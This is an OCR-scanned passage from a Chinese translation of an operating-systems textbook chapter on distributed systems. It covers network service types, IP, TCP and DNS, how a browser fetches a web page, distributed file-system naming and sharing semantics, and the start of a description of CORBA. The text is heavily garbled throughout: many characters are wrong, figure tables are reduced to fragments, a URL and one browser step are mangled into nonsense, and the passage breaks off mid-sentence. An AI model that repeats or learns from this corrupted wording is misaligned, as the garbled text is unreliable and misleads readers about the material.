目 己 的 路 径 通过 系统 。 通 常 ， 当 两 个 消息 被 送 往 同 一 个 目的 地 时 ， 第 
一 个 发 运 的 消 居 会 站 先 到 达 。 但 是 ， 有 可 能 第 一 个 发 送 的 消 恩 会 补 延 
误 ， 这 样 第 二 个 消息 会 自 先 到 达 。 而 对 于 面向 连接 的 服务 而 许 ， 这 是 
不 可 能 发 生 的 。 


每 种 服务 可 以 用 服务 质量 (quality of service) 表征 。 有 些 服务 就 
其 从 来 不 丢失 数据 而 言 是 可 靠 的 。 一 般 来 说 ， 可 靠 的 服务 是 用 以 下 方 
式 实现 的 ， 接 收 者 发 回 一 个 特别 的 确认 包 (acknowledgement 
packet) ， 确 认 每 个 收 到 的 消息 ， 这 样 发 送 者 就 确信 消息 到 达 了 “。 不 过 
确认 的 过 程 引 入 了 过 载 和 延迟 的 问题 ， 检 查 包 的 丢失 征 必 要 的 ， 但 是 
这 样 确实 减缓 了 传送 的 速度 。 


一 种 适合 可 靠 的 、 面 癌 和 连接 服务 的 典型 场景 是 文件 传送 。 文 件 的 
所 有 者 布 望 确 保 所 有 的 信息 位 都 是 正确 的 ， 并 且 按 照 以 其 所 发 送 的 顺 
序 到 达 。 几 乎 没有 哪个 文件 发 送 客户 会 愿意 接受 偶尔 会 弄 乱 或 丢失 一 
些 位 的 文件 传送 服务 ， 即 使 其 发 送 速度 更 快 。 


可 靠 的 、 面 向 连接 的 服务 有 两 种 轻微 变种 (minor variant) : 消息 
序列 和 字 节 流 。 在 前 者 的 服务 中 ， 保 留 着 消息 的 边界 。 当 两 个 1KB 的 
消息 发 送 时 ， 它 们 以 两 个 有 区 别 的 1KB 的 消息 形式 到 达 ， 决 不 会 成 为 
一 个 2KB 的 消息 。 在 后 者 的 服务 中 ， 连 接 只 是 形成 为 一 个 字 市 流 ， 不 
存在 消息 的 边界 。 当 2K 字 节 到 达 接 收 者 时 ， 没 有 办 法 分 辨 出 所 发 送 的 
是 一 个 2KB 消 息 、 两 个 1KB 消 息 还 是 2048 个 单字 市 的 消息 。 如 果 以 分 离 
的 消息 形式 通过 网 络 把 一 本 书 的 页 面 发 送 到 一 台 照 排 机 上 ， 在 这 种 情 
形 下 也 许 保留 消息 的 边界 是 重要 的 。 而 另 一 方面 ， 在 通过 一 个 终端 登 
录 进 入 某 个 远程 分 时 系统 时 ， 所 需要 的 也 只 是 从 该 终端 到 计算 机 的 字 
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对 某 些 应 用 而 言 ， 由 确认 所 引入 的 时 延 是 不 可 接受 的 。 一 种 这 样 
的 应 用 例子 是 数字 化 的 语音 通信 。 对 电话 用 户 而 言 ， 他 们 宁可 时 而 听 
到 一 点 噪音 或 一 个 被 牌 曲 的 词 ， 也 不 会 愿意 为 了 确认 而 接受 时 延 。 


并 不 是 所 有 的 应 用 都 需要 连接 。 例 如 ， 在 测试 网 络 时 ， 所 需要 的 
只 是 一 种 发 送 单个 包 的 方法 ， 其 中 的 这 个 包 具 备 有 高 可 达到 率 但 不 保 
证 一 定 可 达 。 不 可 靠 的 〈 意 味 着 没有 确认 ) 无 连接 服务 ， 常 常 称 作 数 
据 报 服务 (datagram service) ， 它 模拟 了 电报 服务 ， 这 种 服务 也 不 为 发 
送 者 提供 回 送 确认 的 服务 。 


在 其 他 的 情形 下 ， 不 用 建立 连接 就 可 发 送 短 消息 的 便利 是 受到 欢 
迎 的 ， 但 是 可 靠 性 仍然 是 重要 的 。 可 以 把 确认 数据 报 服务 
(acknowledged datagram service) 提供 给 这 些 应 用 使 用 。 它 类 似 于 寄 送 
一 封 挂号 信 并 且 要 求 得 到 一 个 返回 收据 。 当 收据 回 送 到 之 后 ， 发 送 者 
就 可 以 绝对 确信 ， 该 信 已 被 送 到 所 希望 的 地 方 且 没有 在 路 上 丢失 。 


还 有 一 种 服务 是 请 求 -应 答 服 务 (request-reply service) 。 在 这 种 服 
务 中 ， 发 送 着 传送 一 份 包含 一 个 请 求 的 数据 报 ; 应 答 中 含有 答复 。 例 
如 ， 发 给 本 地 图 书馆 的 一 份 询问 维 召 尔 语 在 什么 地 方 被 使 用 的 请 求 融 
属于 这 种 类 型 。 在 客户 机 -服务 硕 模 式 的 通信 实现 中 第 种 采用 请 求 -应 
答 : 客户 机 发 出 一 个 请 求 ， 而 服务 瑚 则 响应 该 请 求 。 岁 8-33 总 结 了 上 面 
讨论 过 的 各 种 服务 类 型 。 


ny TA i 书 的 页 序列 


ae A EE i 远程 登录 
不 可 靠 连接 数字 化 语音 
不 可 靠 数据 报 网 络 测试 数据 包 
eae | 确认 数据 报 


请 求 - 应 答 数据 库 查询 
Al 8-33 六 种 不 同类 型 的 网 络 服务 
2. 网 络 协议 


所 有 网 络 都 有 高 度 专门 化 的 规则 ， 用 以 说 明 什么 消息 可 以 发 送 以 
及 如 何 响应 这 些 消息 。 例 如 ， 在 某 些 条 件 下 (如 文件 传送 ，， 当 一 条 
消 妃 从 源 送 到 目的 地 时 ， 目 的 地 被 要 求 返回 一 个 确认 ， 以 表示 正确 收 
到 了 该 消息 。 在 其 他 情形 下 (如 数字 电话 ) ， 就 不 要 求 这 样 的 确认 。 
用 于 特定 计算 机 通信 的 这 些 规则 的 集合 ， 称 为 协议 (protocol) 。 有 许 
多 种 协议 ， 包 括 路 由 需 - 路 由 融 协 议 、 主 机 -主机 协议 以 及 其 他 协议 等 。 
要 了 解 计算 机 网 络 及 其 协议 的 完整 论述 ， 可 参阅 《计算 机 网 络 》 


(Computer Networks, Tanenbaum, 2003) ° 


所 有 的 现代 网 络 都 使 用 所 谓 的 协议 栈 (protocol stack) 把 不 同 的 协 
议 一 层 一 层 合 加 起 来 。 每 一 层 解决 不 同 的 问题 。 例 如 ， 处 于 最 低层 的 
协议 会 定义 如 何 识别 比特 流 中 的 数据 包 的 起 始 和 结束 位 置 。 在 更 高 一 
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目标 节点 。 再 高 一 层 上 ， 协 议会 确保 多 包 消 息 中 的 所 有 数据 包 都 按照 
合适 的 顺序 正确 到 达 。 


大 多 数 分 布 式 系统 都 使 用 mnternet 作 为 基础 ， 因 此 这 些 系统 使 用 的 
关键 协议 是 两 种 主要 的 Internet 协 议 : IPFITCP ° IP (Internet Protocol) 
是 一 种 数据 报 协议 ， 发 送 者 可 以 向 网 络 上 发 出 长 达 64KB 的 数据 报 ， 并 
期 望 它 能 够 到 达 。 它 并 不 提供 任何 保证 。 当 数据 报 在 网 络 上 传送 时 ， 
它 可 能 被 切割 成 更 小 的 包 。 这 些 包 独 立 进行 传输 ， 并 可 能 通过 不 同 的 
路 由 。 当 所 有 的 部 分 都 到 达 目 的 地 时 ， 再 把 它们 按照 正确 的 顺序 装配 
起 来 并 提交 出 去 。 


当前 有 两 个 版 本 的 IP 在 使 用 ， 即 v4 和 v6。 当 前 v4 仍然 占有 支配 地 
位 ， 所 以 我 们 这 里 主要 讨论 它 ， 但 是 ，v6 是 未 来 的 发 展 方向 。 每 个 v4 
包 以 一 个 40 字 市 的 包头 开始 ， 其 中 包含 32 位 源 地 址 和 32 位 目标 地 址 。 
这 些 地 址 就 称 为 卫 地 址 ， 它 们 构成 了 Internet 中 路 由 选择 的 基础 。 通常 
IP 地 址 写作 4 个 由 点 隔 开 的 十 进 制 数 ， 每 个 数 介 于 0 一 255 之 间 ， 例 如 
192.31.231.65。 当 一 个 包 到 达 路 由 器 时 ， 路 由 器 会 解析 出 卫 目 标 地 址 ， 
并 利用 该 地 址 选择 路 由 。 


既然 IP 数 据 报 是 非 应 答 的 ， 所 以 对 于 Internet 的 可 靠 通信 仅仅 使 用 
IP 是 不 够 鸣 。 为 了 提供 可 靠 的 通信 ， 通 党 在 下层 之 上 使 用 另 一 种 协议 ， 
TCP (Transmission Control Protocol， 传 输 控 制 协议 ) 。TCP 使 用 IP 来 提 


供 面向 连接 的 数据 流 。 为 了 使 用 TCP， 进 程 需要 首先 与 一 个 远程 进程 建 
立 连 接 。 被 请 求 的 进程 需要 通过 机 器 的 IP 地 址 和 机 器 的 端口 号 来 指 
定 ， 而 对 进入 的 连接 感 兴趣 的 进程 监听 该 疾 口 。 这 些 工作 完成 之 后 ， 

只 需 把 字 世 流放 入 连接 ， 那 么 就 能 保证 它们 会 从 另 一 端 按照 正确 的 顺 
序 完好 无 损 地 出 来 。TCP 的 实现 是 通过 序列 号 、 校 检 和 、 出 错 重 传 来 提 
供 这 种 保证 的 。 所 有 这 些 对 于 发 送 者 和 接收 者 进程 都 是 透明 的 。 它 们 
看 到 的 只 古 可 靠 的 进程 间 通 信 ， 束 像 UNIX 管 道 一 样 。 


为 了 了 解 这 些 协议 的 交互 过 程 ， 我 们 来 考虑 一 种 最 简单 的 情况 : 
要 发 送 的 消息 很 小 ， 在 任何 一 层 都 不 需要 分 割 它 。 主 机 处 于 一 个 连接 
到 Internet 上 的 Ethernet 中 。 那 么 究竟 发 生 了 什么 呢 ? 首先 ， 用 户 进 程 产 
生 消 息 ， 并 在 一 个 事先 建立 好 的 TCP 连 接 上 通过 系统 调用 来 发 送 消息 。 
内 核 协 议 栈 依次 在 消息 前 面 添 加 TCP 包 头 和 IP 包 头 。 然 后 由 Ethernet 驱 
动 再 添加 一 个 Ethernet 包 头 ， 并 把 该 数据 包 发 送 到 Ethernet 的 路 由 器 上 。 
如 图 8-34 路 由 句 把 数据 包 发 送 到 Internet 上。 
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Al 8-34 数据 包头 的 素 加 过 程 


为 了 与 远程 机 器 建立 连接 〈 或 者 仅仅 是 给 它 发 送 一 个 数据 包 ) ， 
需要 知道 它 的 IP 地 址 。 因 为 对 于 人 们 来 说 管理 32 位 的 IP 地 址 列表 是 很 不 
方便 的 ， 所 以 就 产生 了 一 种 称 为 DNS (Domain Name System， 域 名 系 
统 ) 的 方案 ， 它 作为 一 个 数据 库 把 主机 的 ASCII 名 称 映射 为 对 应 的 了 P 地 
址 。 因 此 就 可 以 用 DNS 名 称 (如 star.cs.vu.nl) 来 代替 对 应 的 卫 地 址 ) 

(如 130.37.24.6) 。 由 于 Intemet 电 子 邮件 地 址 采用 “用 户 名 @DNS 主 机 
名 ”的 形式 命名 ， 所 以 DNS 名 称 广为人知 。 该 命名 系统 允许 发 送 方 机 器 
上 的 邮件 程序 在 DNS 数 据 库 中 查找 目标 机 右 的 IP 地 址 ， 并 与 目标 机 上 
的 邮件 守护 进程 建立 TCP 连 接 ， 然 后 把 邮件 作为 文件 发 送出 去 。 用 户 名 
一 并 发 送 ， 用 于 确定 存放 消息 的 邮箱 。 


8.4.3 ”基于 文档 的 中 间 件 


现在 我 们 已 经 有 了 一 些 有 关 网 络 和 协议 的 背景 知识 ， 可 以 开始 讨 
论 不 同 的 中 间 件 层 了 。 这 些 中 间 件 层 位 于 基础 网 络 上 ， 为 应 用 程序 和 
用 户 提 供 一 致 的 范 型 。 我 们 将 从 一 个 简单 但 是 却 非 常 著名 的 例子 开 
te: 万 维 网 (World Wide Web) 。Web 是 由 在 欧洲 核子 中 心 (CERN) 
工作 的 Tim Berners-Lee 于 1989 年 发 明 的 ， 从 那 以 后 web 就 像 野 火 一 样 传 
遍 了 全 世界 。 


Web 痛 后 的 原始 范 型 是 非常 向 单 的 : 每 个 计算 机 可 以 村 有 一 个 或 多 
个 文档 ， 称 为 Web 页 面 (Web page) ° 在 每 个 页 面 中 有 文本 、 图 像 、 图 
标 、 声 音 、 电 影 等 ， 还 有 到 其 他 页 面 的 超 链 接 (hyperlink) (指针 ) 。 
当 用 户 使 用 一 个 称 为 Web 浏览 器 (Web browser) 的 程序 请 求 一 个 web 
页 面 时 ， 该 页 面 就 显示 在 用 户 的 屏幕 上 。 点 击 一 个 超 链接 会 使 得 屏幕 
上 的 当前 页 面 被 所 指 同 的 页 面 蔡 代 。 尽 管 近 来 在 Web 上 添加 了 许多 的 伦 
哨 各 笔 ， 但 是 其 确 层 的 范 型 仍旧 很 清楚 地 存在 着 : Web 是 一 个 由 文档 构 
成 的 巨大 有 回 图 ， 其 中 文档 可 以 指 癌 其 他 的 文档 ， 如 图 8-35 所 示 。 


AI 8-35 Web 是 一 个 由 文档 构成 的 大 有 问 图 


每 个 Web 页 面 都 有 一 个 惟一 的 地 址 ， 称 为 URL (统一 资源 定位 符 ， 
Uniform Resource Locator) ， 其 形式 为 protocol://DNS-name/file-name ° 
http 协 议 ( 超 文 本 传输 协议 ，HyperText Transfer Protocol) 是 最 常用 
的 ， 不 过 ftp 和 其 他 协议 也 在 使 用 。 协 议 名 后 面 是 拥有 该 文件 的 主机 的 
DNS 名 称 。 最 后 是 一 个 本 地 文件 名 ， 用 来 说 明 需 要 使 用 哪个 文件 。 


整个 系统 按 如 下 方式 结合 在 一 起 : Web 根 本 上 是 一 个 客户 机 -服务 
妖 系 统 ， 用 户 是 客户 病 ， 而 Web 站 点 则 是 服务 器 。 当 用 户 给 浏览 强 提 供 
一 个 URL 时 (或 者 键入 URL， 或 者 点 击 当 前 页 面 上 的 某 个 超 链 接 ) ， 
浏 哆 絮 则 按照 一 定 的 步 又 调 取 所 请 求 的 Web 页 面 。 作 为 一 个 例子 ， 假 设 
提供 的 URL 是 http:/www.minix3.org/doc/fagq.html。 浏览 器 按照 下 面 的 步 
又 取得 所 需 的 页 面 。 


1) 浏 览 器 加 DNS 询问 www.minix3.org 的 卫 地 址 。 


2)DNS 回 答 ， 是 130.37.20.20 。 


3) 浏 览 器 建立 一 个 到 130.37.20.20 上 端口 80 的 TCP 连 接 。 


4) 接 着 浏览 器 发 送 对 文件 docfaq.html 的 请 求 。 
5)www.acm.orgin a 38 SC fF doc/faq.html ° 
6) 释 放 TCP 连 接 ° 

7) 浏 览 器 显示 doc/faq.html 文 件 中 的 所 有 文本 。 
8) 浏 览 器 获取 并 显示 doc/faq.html 中 的 所 有 图 像 。 


大 体 上 ， 这 就 是 web 的 基础 以 及 它 是 如 何 工作 的 。 许 多 其 他 的 功能 
已 经 添加 在 了 上 述 基 本 Web 功 能 之 上 了 ,包括 样式 表 、 可 以 在 运行 中 生 
成 的 动态 网 页 、 带 有 可 在 客户 机 上 执行 的 小 程序 或 脚本 的 页 面 等 ， 不 
过 对 它们 的 讨论 超出 了 本 书 的 范围 。 


8.4.4 基于 文件 系统 的 中 间 件 


隐 藏 在 Web 青 后 的 基本 丰 想 是 ， 使 一 个 分 布 式 系统 看 起 来 像 一 个 己 
大 的 、 超 链接 的 集合 。 男 一 种 处 理 方式 则 是 使 一 个 分 布 式 系统 看 起 来 
像 一 个 大 型 文件 系统 。 在 这 一 市 中 ， 我 们 将 考察 一 些 与 设计 一 个 广 域 
文件 系统 有 天 的 问题 。 


分 布 式 系统 采用 一 个 文件 系统 模型 意味 着 只 存在 一 个 全 局 文件 系 
统 ， 全 世界 的 用 户 都 能 够 读 写 他 们 各 目 具有 授权 的 文件 。 通 过 一 个 进 
程 将 数据 写 入 文件 而 丸 一 个 进程 把 数据 读 出 的 办 法 可 以 实现 通信 。 由 
此 产生 了 标准 文件 系统 中 的 许多 问题 ， 但 是 也 有 一 些 与 分 布 性 相关 的 
新 问题 。 


1. 传 输 模 式 


第 一 个 问题 是 ， 在 上 传 /下 载 模式 (upload/download model) 和 远 
程 访问 模式 之 间 的 选择 问题 。 在 前 一 种 模式 中 ， 如 图 8-36a 所 示 ， 通 过 
把 远程 服务 器 上 的 文件 复制 到 本 地 的 方法 ， 实 现 进程 对 远程 文件 的 访 
问 。 如 果 只 是 需要 读 该 文件 ， 考 虑 到 高 性 能 的 需要 ， 就 在 本 地 读 出 该 
文件 。 如 果 需 要 写 入 该 文件 ， 就 在 本 地 写 入 。 进 程 完 成 工作 之 后 ， 把 
更 新 后 的 文件 送 回 原来 的 服务 器 。 在 远程 访问 模式 中 ， 文 件 停留 在 服 


务 器 上 ， 而 客户 机 回 服 务 器 发 出 命令 并 在 服务 器 上 完成 工作 ， 如 图 8- 
36b 上 所 示 。 


1. 客户 机 取 文 件 


客户 机 服务 器 上 日 文件 服务 器 
ATT pee 请 求 
新 文件 
mm | 由 
mieh g. 
3. 当 客 户 机 完成 
2. 访问 在 客户 J- 作 时 ， 文件 被 2 a 


a) 


b) 


Al 8-36 a) 上 传 /下 载 模式 ; b) 远 程 访问 模式 


上 传 /下 载 模式 的 优点 是 简单 ， 而 且 一 次 性 传送 整个 文件 的 方法 比 
用 小 块 传送 文件 的 方法 效率 更 高 。 其 缺点 是 为 了 在 本 地 存放 整个 文 
件 ， 必 须 拥有 足够 的 空间 ， 即 使 只 需要 文件 的 一 部 分 也 要 移动 整个 文 


件 ， 这 样 做 显然 是 一 种 浪费 ， 而 且 如 果 有 多 个 并 发 用 户 则 会 产生 一 致 
性 问题 。 


2. 目 录 层 次 


文件 只 是 所 涉及 的 问题 中 的 一 部 分 。 玫 一 部 分 问题 生 目 隶 系统 
所 有 的 分 布 式 系统 者 文 持 有 多 个 文件 的 目录 。 接 下 来 的 设计 问题 是 ， 

是否 所 有 的 用 户 都 拥有 该 目录 层次 的 相同 视图 。 图 8-37 中 的 例子 正好 表 
达 了 我 们 的 意思 。 在 图 8-37a 中 有 两 个 文件 服务 器 ， 每 个 服务 器 有 三 个 


目录 和 一 些 文件 。 在 图 8-37b 中 有 一 个 系统 ， 其 中 所 有 的 客户 (以 及 其 
他 机 器 ) 对 该 分 布 式 文件 系统 拥有 相同 的 视图 。 如 果 在 某 台 机 器 上 路 
径 /D/E/x 是 有 效 的 ， 则 该 路 径 对 所 有 其 他 的 客户 也 是 有 效 的 。 


相反 ， 在 图 8-37c 中 ， 不 同 的 机 右 有 该 文件 系统 的 不 同 视图 。 重 复 
先前 的 例子 ， 路 径 /D/E/x 可 能 在 客户 机 1 上 有 效 ， 但 古 在 客户 机 2 上 无 
效 。 在 通过 远程 安装 方式 管理 多 个 文件 服务 器 的 系统 中 ， 图 8-37c 是 一 
个 典型 示例 。 这 样 既 灵 活 又 可 直接 实现 ， 但 是 其 缺点 是 ， 不 能 使 得 整 
个 系统 行为 像 单 一 的 、 旧 式 分 时 系统 。 在 分 时 系统 中 ， 文 件 系 统 对 任 
何 进 程 部 是 一 样 的 ， 如 图 8-37b 中 的 模型 。 这 个 属性 显然 使 得 系统 容易 
编程 和 理解 。 


文件 服务 器 1 客户 机 1 客户 机 1 


客户 机 2 


a) b) 

图 8-37 a) 两 个 文件 服务 器 。 和 矩形 代表 目录 ， 国 圈 代 表 文 件 ，b) 所 有 

客户 机 都 有 相同 文件 系统 视图 的 系统 ，c) 不 同 的 客户 机 可 能 会 有 不 同文 
件 系 统 视 图 的 系统 


一 个 密切 相关 的 问题 是 ， 是 否 存 在 一 个 所 有 的 机 右 都 承认 的 全 局 
根 目 未 。 获 得 全 局 根 目 孙 的 一 个 方法 是 ， 让 每 个 服务 部 的 根 目 永 只 包 


舍 一 个 目录 项 。 在 这 种 情况 下 ， 路 径 取 /serverpath 的 形式 ， 这 种 方式 有 
其 缺点 ， 但 是 至 少 做 到 了 在 系统 中 处 处 相同 。 


3. 命 名 透明 性 


这 种 命名 方式 的 主要 问题 是 ， 它 不 是 完全 透明 的 。 这 里 涉及 两 种 
类 型 的 透明 性 (transparency) ， 并 且 有 必要 加 以 区 分 。 第 一 种 ， 位 置 
透明 性 (location transparency) ， 其 舍 义 是 路 径 名 没有 隐 含 文件 所 在 位 
置 的 信息 。 类 似 于 /serverl/dirl/dir2/x 的 路 径 告诉 每 个 人 ，x 是 在 服务 器 1 
上 ， 但 是 并 没有 说 明 该 服务 器 在 哪里 。 在 网 络 中 该 服务 器 可 以 随意 移 
动 ， 而 该 路 径 名 却 不 必 改 动 。 所 以 这 个 系统 具有 位 置 透明 性 。 


但 是 ， 假 设 文件 非常 大 而 在 服务 器 1 上 的 空间 又 很 紧张 。 进 而 ， 如 

果 在 服务 器 2 上 有 大 量 的 空间 ， 那 么 系统 也 许 会 自动 地 将 x 从 1 移 到 服务 
如 2 上 。 不 邓 地 ， 当 整个 路 径 名 的 第 一 个 分 量 是 服务 右 时 ， 即 使 dir1 和 
dir2 在 两 个 服务 器 上 都 存在 ， 系 统 也 不 能 将 文件 自动 地 移动 到 其 他 的 服 
务 器 上 “。 问 题 在 于 ， 让 文件 自动 移动 就 得 将 其 路 径 名 
从 /server1/dir1/dir2/x 改 变 成 为 /server2/dir1/dir2/x。 如 果 路 径 改 变 了 ， 那 
么 在 内 部 拥有 前 一 个 路 径 字 符 串 的 程序 就 会 停止 工作 。 如 果 在 一 个 系 
统 中 文件 移动 时 文件 的 名 称 不 会 随 之 改变 ， 则 称 为 具有 位 置 独立 性 

(location independence) 。 将 机 器 或 服务 器 名 称 仍 在 路 径 名 中 的 分 布 
式 系统 显然 不 具有 位 置 独 立 性 。 一 个 基于 远程 安装 ( 挂 载 ， 的 系统 当 
然 也 不 具有 位 置 独立 性 ， 因 为 在 把 某 个 文件 从 一 个 文件 组 (安装 单 


元 ) 移 到 男 一 个 文件 组 时 ， 是 不 可 能 仍旧 使 用 原来 的 路 径 名 的 。 可 见 
位 置 独 立 性 是 不 容易 实现 的 ， 但 它 是 分 布 式 系统 所 期 望 的 一 个 属性 


ie) 


这 里 把 前 面 讨 论 过 的 内 容 加 以 简要 的 总 结 ， 在 分 布 式 系统 中 处 理 
文件 和 目录 命名 的 方式 通 币 有 以 下 三 种 : 


1) 机 器 + 路 径 名 ， 如 /machine/path 或 machine:path ° 


2) 将 远程 文件 系统 安 流 在 本 地 文件 层次 中 。 


3) 在 所 有 的 机 右上 看 来 部 相同 的 单一 名 子 空间 。 


前 两 种 方式 很 容易 实现 ， 特 别 是 作为 将 原本 不 古 为 分 布 式 应 用 而 
设计 的 已 有 系统 连接 起 来 的 方式 时 是 这 样 。 而 第 三 种 方式 的 实现 则 是 
困难 的 ， 并 且 需 要 仔细 的 设计 ， 但 是 它 能 够 减轻 了 程序 员 和 用 户 的 负 
担 。 


4. 文 件 共享 的 语义 


当 两 个 或 多 个 用 户 共 享 同一 个 文件 时 ， 为 了 避免 出 现 问题 有 必要 
精确 地 定义 读 和 写 的 语义 。 在 时 处 理 器 系统 中 ， 通 常 ， 语 义 是 如 下 表 
述 的 ， 在 一 个 read 系 统 调用 跟随 一 个 write 系统 调用 时 ， 则 read 返 回 刚才 
写 入 的 值 ， 如 图 8-38a 所 示 。 类 似 地 ， 当 两 个 write 连续 出 现 ， 后 跟随 一 
个 read 时 ， 则 读 出 的 值 是 后 一 个 写 操 作 所 存 入 的 值 。 实 际 上 ， 系 统 强制 


所 有 的 系统 调用 有 序 ， 并 且 所 有 的 处 理 器 都 看 到 同样 的 顺序 。 我 们 将 
这 种 模型 称 为 顺序 一 致 性 (sequential consistency) 。 


在 分 布 式 系统 中 ， 只 要 只 有 一 个 文件 服务 右 而 且 客 户 机 不 缓存 文 
件 ， 那 么 顺序 一 致 性 是 很 容易 实现 的 。 所 有 的 read 和 write 直接 发 送 到 这 
个 文件 服务 器 上 ， 而 该 服务 器 严格 地 按 顺 序 执行 它们 。 


不 过 ， 实 际 情 关中， 如 有 果 所 有 的 文件 请 求 都 必须 送 到 单 台 文件 服 
务 袁 上 处 理 ， 那 么 这 个 分 布 式 系统 的 性 能 往往 会 很 糟糕 。 这 个 问题 可 
以 用 如 下 方式 来 解决 ， 即 证 客户 机 在 其 私有 的 高 速 缓存 中 保留 经 党 使 
用 文件 的 本 地 副本 。 但 是 ， 如 果 客 户 机 1 修改 了 在 本 地 高 速 缓存 中 的 文 
件 ， 而 紧 接 着 客户 机 2 从 服务 器 上 读 取 该 文件 ， 那 么 客户 机 2 就 会 得 到 
一 个 已 经 过 时 的 文件 ， 如 图 8-38b 所 示 。 


客户 机 1 


单 处 理 器 2. 写 入 “ec” 


LSA” 原始 
文件 


文件 服务 器 


2. 读 取 “abc” 


a) 


图 8-38 al 顺序 一 致 性 ，b) 在 一 个 带 有 高 速 缓存 的 分 布 式 系统 中 ， 读 
文件 可 能 会 返回 一 个 废弃 的 值 


走出 这 个 困 局 的 一 个 途径 是 ， 将 高 速 缓存 文件 上 的 改动 立即 传送 
回 服务 右 。 尽 管 概念 上 很 简单 ， 但 这 个 方法 却 是 低 效 率 的 。 另 一 个 解 
决 方案 是 放宽 文件 共享 的 语义 。 一 般 的 语义 要 求 一 个 读 操 作 要 看 到 其 
之 前 的 所 有 写 操作 的 效果 ， 我 们 可 以 定义 一 条 新 规则 来 取代 它 :“ 在 一 
个 打开 文件 上 所 进行 的 修改 ， 最 初 仅 对 进行 这 些 修改 的 进程 是 可 见 
的 。 只 有 在 该 文件 关闭 之 后 ， 这 些 修改 才 对 其 他 进程 可 见 。” 采 用 这 样 


一 个 规则 不 会 改变 在 图 8-38b 中 发 生 的 事件 ， 但 是 这 条 规则 确实 重 狐 定 
义 了 所 谓 正 确 的 具体 操作 行为 \B 得 到 了 文件 的 原始 值 ) 。 当 客户 机 1 
天 闭 文 件 时 ， 它 将 一 个 副本 回 送 给 服务 器 ， 因 此 ， 正 如 所 期 鹿 的 ， 后 
续 的 read 操 作 得 到 了 新 的 值 。 实 际 上 ， 这 个 规则 束 古 图 8-36 中 的 上 传 /下 
载 模式 。 这 种 语义 已 经 得 到 广泛 的 实现 ， 即 所 谓 的 会 话语 义 (session 


semantic) 。 


使 用 会 话语 义 产 生 了 新 的 问题 ， 即 如 果 两 个 或 更 多 的 客户 机 同时 
缓存 并 修改 同一 个 文件 ， 应 该 怎么 办 ? 一 个 解决 方案 是 ， 当 每 个 文件 
依次 天 闭 时 ， 其 值 会 被 送 回 给 服务 占 ， 所 以 最 后 的 结 玉 取决 于 哪个 文 
件 最 后 关闭 。 一 个 不 太 令 人 满意 的 、 但 是 较 容 易 实现 的 替代 方案 是 ， 
最 后 的 结 东 十 在 各 种 候选 中 选择 一 个 ， 但 并 不 指定 是 哪 一 个 。 


对 会 话语 义 的 男 一 种 处 理 方式 是 ， 使 用 上 传 /全 载 模式 ,但 是 目 动 
对 已 经 下 载 的 文件 加 尔 。 其 他 试图 下 载 该 文件 的 客户 机 将 被 挂 起 直到 
第 一 个 客户 机 返回 。 如 琳 对 某 个 文件 的 操作 要 求 非常 多 ， 服 务 占 可 以 
向 持 有 该 文件 的 客户 机 发 送 消息 ， 询 问 是 否 可 以 加 快速 度 ， 不 过 这 样 
做 可 能 没有 作用 。 总 而 言 之 ， 正 确 地 实现 共享 文件 的 语义 是 一 件 未 手 
的 事情 ， 并 不 存在 一 个 优雅 和 有 效 的 解决 方案 。 


8.4.5 “基于 对 象 的 中 间 件 


现在 让 我 们 考察 第 三 种 范 型 。 这 里 不 再 说 一 切 都 是 文档 或 者 一 切 
都 是 文件 ， 取 而 代 之 ， 我 们 会 说 一 切 都 是 对 象 。 对 象 是 变量 的 集 

这 些 变量 与 一 套 称 为 方法 的 访问 过 程 绑 定 在 一 起 。 进 程 不 允许 直接 访 
此 


问 这 些 变 量 。 相 反 ， 要 求 它们 调用 方法 。 


有 一 些 程序 设计 语言 ， 如 C++ 和 Java， 是 面向 对 象 的 ， 但 这 些 对 象 
是 语言 级 的 对 象 ， 而 不 是 运行 时 刻 的 对 象 。 一 个 知名 的 基于 运行 时 对 
象 的 系统 是 CORBA (公共 对 象 请 求 代理 体系 结构 ，Common Object 
Request Broker Architecture) (Vinoski, 1997) 。CORBA 是 一 个 客户 
机 -服务 器 系统 ， 其 中 在 客户 机 上 的 客户 进程 可 以 调用 位 于 (可 能 是 远 
Re) 服务 器 上 的 对 象 操 作 。CORBA 是 为 运行 不 同 硬件 平台 和 操作 系统 
的 异 构 系 统 而 设计 的 ， 并 且 用 各 种 语言 编写 。 为 了 使 在 一 个 平台 上 的 
客户 有 可 能 使 用 在 不 同 平台 上 的 服务 器 ， 将 ORB (对 象 请 求 代理 ， 
Object Request Broker) 插入 到 客户 机 和 服务 器 之 间 ， 从 而 使 它们 相互 
匹配 。ORB 在 CORBA 中 扮演 着 重要 的 角色 ， 以 至 于 连 该 系统 也 采用 了 


这 个 名 称 。 


每 个 CORBA 对 象 是 由 叫做 IDL (接口 定义 语言 ，Interface 
Definition Language) 的 语言 中 的 接口 定义 所 定义 的 ， 说 明 该 对 象 提 供 
什么 方法 ， 以 及 每 个 方法 期 望 使 用 什么 类 型 的 参数 。 可 以 把 IDL 的 规约 


(specification) 编译 进 客户 端 桩 过 程 中 ， 并 且 存 储 在 一 个 库 里 。 如 果 
一 个 客户 机 进程 预先 知道 它 需 要 访问 某 个 对 象 ， 这 个 进程 则 与 该 对 象 
的 客户 端 桩 代码 链接 。 也 可 以 把 IDL 规 约 编译 进 服务 器 一 方 的 一 个 框架 

(skeleton) 过 程 中 。 如 果 不 能 提前 知道 进程 需要 使 用 哪 一 个 CORBA 对 
象 ， 进 行动 态 调 用 也 是 可 能 的 ， 但 是 有 关 动 态 调用 如 何 工作 的 原理 则 
不 在 本 书 的 讲述 范围 内 。 


当 创 建 一 个 CORBA 对 象 时 ， 一 个 对 它 的 引用 也 创建 出 来 并 返回 给 
创建 它 的 进程 。 该 引用 涉及 进程 如 何 标 识 该 对 象 以 便 随后 对 其 方法 进 
行 调用 。 该 引用 还 可 以 传递 给 其 他 的 进程 或 存储 在 一 个 对 象 目 孙 中 。 


要 调用 一 个 对 象 中 的 方法 ， 客 户 机 进程 必须 首先 获得 对 该 对 象 的 
引用 。 引 用 可 以 直接 来 源 于 创建 进程 ， 或 更 有 可 能 是 ， 通 过 名 字 寻 找 
或 通过 功能 在 有 某 类 目录 中 寻找 。 一 旦 有 了 该 对 象 的 引用 ， 客 户 机 进程 
将 把 方法 调用 的 参数 编排 进 一 个 便利 的 结构 中 ， 然 后 与 客户 机 ORB 联 
系 。 接 着 ,客户 机 ORB 疝 服务 器 ORB 发 送 一 条 消息 ， 后 者 真正 调用 对 
象 中 的 方法 。 整 个 机 制 类 似 于 RPC 。 


ORB 的 功能 是 将 客户 机 和 服务 器 代码 中 的 所 有 低层 次 的 分 布 和 通 
